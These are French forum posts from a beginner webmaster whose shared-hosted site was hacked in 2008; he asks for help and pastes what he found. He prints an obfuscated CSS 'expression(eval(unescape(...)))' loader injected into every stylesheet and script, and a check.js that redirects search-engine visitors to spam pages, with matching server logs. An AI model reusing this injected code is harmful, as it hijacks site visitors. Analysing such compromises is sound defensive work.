raphio000

c'est un serveur mutualisé donc je n'ai pas la main sur un antivirus... Je vous enverrais les sources des qu'ils reviennent !! Tous les ficheirs php sur le serveur sont les miens. J'ai un autre probleme qui est surement en relation : Depuis le début de ce probleme, j'ai un probleme de header Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/38/d213986949/htdocs/index.php:1) in /homepages/38/d213986949/htdocs/entetehtml.php on line 2 Alors que ma page index.php commencent ainsi <?php include("entetehtml.php"); //panneau de gauche echo'<div class="floatLeft">'; et ma page entetehtml.php ainsi : <?php session_start(); require_once('fonctions.php'); ce qui logiquement est correct mais il gueule comme si j'avais laissé un blanc devant ma session ou mon header ! J'en ai trop marre

Malheureusement, je ne peux pas te le dire pour l'instant puisque j'ai viré ces fichiers. Mais sans nul doute, ils reviendront dans quelques heures !! Je sais pas quoi faire !

Un ptit indice en plus, j'e trouve toujours ca à la fin du code de mon site !!! <!-- 2function __RP_Callback_Helper(str, strCallbackEvent, splitSize, func){var event = null;if (strCallbackEvent){event = document.createEvent('Events');event.initEvent(strCallbackEvent, true, true);}if (str && str.length > 0){var splitList = str.split('|');var strCompare = str;if (splitList.length == splitSize)strCompare = splitList[splitSize-1];var pluginList = document.plugins;for (var count = 0; count < pluginList.length; count++){var sSrc = '';if (pluginList[count] && pluginList[count].src)sSrc = pluginList[count].src;if (strCompare.length >= sSrc.length){if (strCompare.indexOf(sSrc) != -1){func(str, count, pluginList, splitList);break;}}}}if (strCallbackEvent)document.body.dispatchEvent(event);}function __RP_Coord_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Coord_Callback = str;pluginList[index].__RP_Coord_Callback_Left = splitList[0];pluginList[index].__RP_Coord_Callback_Top = splitList[1];pluginList[index].__RP_Coord_Callback_Right = splitList[2];pluginList[index].__RP_Coord_Callback_Bottom = splitList[3];};__RP_Callback_Helper(str, 'rp-js-coord-callback', 5, func);}function __RP_Url_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Url_Callback = str;pluginList[index].__RP_Url_Callback_Vid = splitList[0];pluginList[index].__RP_Url_Callback_Parent = splitList[1];};__RP_Callback_Helper(str, 'rp-js-url-callback', 3, func);}function __RP_TotalBytes_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_TotalBytes_Callback = str;pluginList[index].__RP_TotalBytes_Callback_Bytes = splitList[0];};__RP_Callback_Helper(str, null, 2, func);}function __RP_Connection_Callback(str){var func = function(str, index, pluginList, splitList){pluginList[index].__RP_Connection_Callback = str;pluginList[index].__RP_Connection_Callback_Url = splitList[0];};__RP_Callback_Helper(str, null, 2, func);} 3//--> </script> Qu'est ce que c'est qu ça ??

Rien du tout avec ta commande Kioob, merci quand meme ! Je continu a chercher !

voila check.js : if ( (Math.random()*60 < JSS1) && document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearc h|yandex|rambler|aport|mail|gogo|poisk|alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|cl ix|terravista|gratis-ting|suomi24)\./) && document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keyword s|search_string|search_word|buscar|text|words|su|q t|rdata)\=/) && !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keyword s|search_string|search_word|buscar|text|words|su|q t|rdata)\=[^&]+(%3A|%22)/) ){ location.href=JSS3+'?r='+encodeURIComponent(docume nt.referrer)+'&s='+JSS2; }; eet voila ce qu'on retrouve dans tous les .css et .js du site: /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63 %75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%4 2%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53% 53%31%20%3D%20%35%34%3B%20%4A%53%53%32%20%3D%20%31 %35%39%38%30%36%3B%20%4A%53%53%33%20%3D%20%27%2F%7 3%63%61%64%6D%69%6E%2F%63%6D%73%2F%69%6D%61%67%65% 73%2F%69%73%61%62%69%66%2F%64%75%6D%6D%79%2E%68%74 %6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%7 5%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65% 6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E %73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%6 3%27%2C%20%27%2F%73%63%61%64%6D%69%6E%2F%63%6D%73% 2F%69%6D%61%67%65%73%2F%69%73%61%62%69%66%2F%63%68 %65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%4 1%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27% 4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E %67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4 E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D% 28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A %73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */

Tiens c'est ca, ca a l'air detre le meme probleme !! Bon alors je post la bas ! Si on pouvait y continuer cette discution, ce serait génial ! J'y ait poster des logs !

A oui c'est exactement ce probleme la ! Alors en fouinant j'ai trouvé ca dans les logs !! 90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/check.js HTTP/1.1" 200 1198 www.kartierwaste.fr "http://www.kartierwaste.fr/index.php?r=1&Largeur=800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-" 90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /images/titre.jpg HTTP/1.1" 200 84494 www.kartierwaste.fr "http://www.kartierwaste.fr/index.php?r=1&Largeur=800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-" 90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/dummy.htm?r=http%3A%2F%2Fimages.google.fr%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2Fimages%2Ftitre.jpg%26imgrefurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2F%26h%3D185%26w%3D1200%26sz%3D83%26hl%3Dfr%26start%3D1%26um%3D1%26tbnid%3DAq7-kjvALB_q4M%3A%26tbnh%3D23%26tbnw%3D150%26prev%3D%2Fimages%253Fq%253DKARTIER%252BWASTE%2526um%253D1%2526hl%253Dfr&s=161266 HTTP/1.1" 200 658 www.kartierwaste.fr "http://images.google.fr/imgres?imgurl=http://www.kartierwaste.fr/images/titre.jpg&imgrefurl=http://www.kartierwaste.fr/&h=185&w=1200&sz=83&hl=fr&start=1&um=1&tbnid=Aq7-kjvALB_q4M:&tbnh=23&tbnw=150&prev=/images%3Fq%3DKARTIER%2BWASTE%26um%3D1%26hl%3Dfr" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-" 90.12.29.215 - - [04/Feb/2008:12:41:05 +0100] "GET /SoftBB/img/apevi/blog.htm HTTP/1.1" 200 37058 www.kartierwaste.fr "http://www.kartierwaste.fr/SoftBB/img/apevi/dummy.htm?r=http%3A%2F%2Fimages.google.fr%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2Fimages%2Ftitre.jpg%26imgrefurl%3Dhttp%3A%2F%2Fwww.kartierwaste.fr%2F%26h%3D185%26w%3D1200%26sz%3D83%26hl%3Dfr%26start%3D1%26um%3D1%26tbnid%3DAq7-kjvALB_q4M%3A%26tbnh%3D23%26tbnw%3D150%26prev%3D%2Fimages%253Fq%253DKARTIER%252BWASTE%2526um%253D1%2526hl%253Dfr&s=161266" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-" 90.12.29.215 - - [04/Feb/2008:12:41:14 +0100] "GET / HTTP/1.1" 200 6500 www.kartierwaste.fr "http://images.google.fr/imgres?imgurl=http://www.kartierwaste.fr/images/titre.jpg&imgrefurl=http://www.kartierwaste.fr/&h=185&w=1200&sz=83&tbnid=Aq7-kjvALB_q4M:&tbnh=23&tbnw=150&hl=fr&um=1&prev=/images%3Fq%3DKARTIER%2BWASTE%26um%3D1%26hl%3Dfr&frame=small" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "-" Ces lignes sont louches mais je comprend pa grand chose !! et le code de check.js, toujours acompagné de dummy.htm et blog.htm, bah je l'ai pas sous la main car je viens de le supprimer, mais sans aucun doute dans 1h il est revenu

J'ai deja recherché dans mes logs apaches mais je ne sais pas trop quoi y chercher !! des POST bizarre? Merci c'est sympa de m'aider, je suis perdu !

En fait sur mon site, les admins doivent se loguer par un formulaire en POST ou il entre leur log et mot de passe ! Celui-ci est stocké en MD5 dans la base de données. Lors du submit du form, le mot de passe entré est crypté en md5 et comparé a celui de la BDD. Si ils concordent, je met en variable de session le login de la personne qui s'est loggué. Et lors de lafffichage de la page ou il pourrait y avoir un formulaire, je vérifie que le loggin dans la variable de session esty bien celui d'un admin par requete SQL. Si il l'est j'affiche le formulaire sinon je ne laffiche pas! Y a t-il un soucis dans cette méthode ?

Alors, tout d'abbord merci de cette rapidité de réponse ! Donc sur mon site on n'upload pas d'images mais des sons ou des videos, ce sui ne change pas grand chose au probleme. Mais, ces formulaires sont protéger par le fait qu'il faille etre admin pour pouvoir uploader, de plus il y a bien une verification sur le type de fichier ! Mais j'y pense, j'ai un formulaire de news à uploader (text). aurait il pu passer par la sachant qu'il faut un mot de passe admin pour y acceder ??

Salut, salut je m'appelle Raphael et je débute dans le web. J'aimerais en faire mon métier, c'est pour cela que je suis en ce moment des cours de developpement. J'espere contribuer du mieux que je peux à ce forum! A bientot

Bonjour à tous. Je vous écris car je suis très embêté !! Depuis quelques semaines, mon site est attaqué par un hacker ! Je m'explique : j'ai remarqué cela grâce à avast qui, un soir, a détécter un virus quand j'ouvrais n'importe quelle page de mon site ! Alors je suuis aller voir le fichier incriminé et l'ai supprimé : "SoftBB/img/apevi/check.js" Mais en me disant qu'on avait réussi a entré chez moi, donc je me posais des questions !! 15mn plus tard, je retrouve le meme fichier au meme endroit !! JE fouine un peu et je retrouve tous mes CSS et js modifié ! Je trouve aussi un header toujours envoyé avant le mien sans trouvé d'où il provient ! Bref, le gros bazar !! Pouvez vous m'aider !! http://www.kartierwaste.fr Merci beaucoup, je sais plus quoi faire. Il ya surement de grosses failles dans mon site ! Soyez indulgent sur le code je débute !